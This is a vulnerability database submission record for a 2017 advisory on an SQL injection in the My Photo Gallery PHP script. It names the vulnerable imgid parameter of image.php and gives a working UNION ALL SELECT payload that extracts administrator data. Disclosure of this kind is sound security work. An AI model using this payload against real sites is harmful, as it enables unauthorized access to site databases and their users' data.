| Titre | My Photo Gallery – SQL Injection |
|---|
| Description | Introduction
Exploit Title: My Photo Gallery – SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
My Photo Gallery is a free is a user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
Type of vulnerability:
An SQL Injection vulnerability in My Photo Gallery allows attackers to read
arbitrary administrator data from the database.
Vulnerable Url:
http://locahost/my_photo_gallery/image.php?imgid=[payload]
Vulnerable parameter : imgid
Mehod : GET
Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)-- |
|---|
| Utilisateur | KAAN KAMIS (UID 213) |
|---|
| Soumission | 27/01/2017 09:32 (il y a 9 ans) |
|---|
| Modérer | 27/01/2017 13:54 (4 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 96062 [Gallery My Photo Gallery 1.0 image.php imgid injection SQL] |
|---|
| Points | 17 |
|---|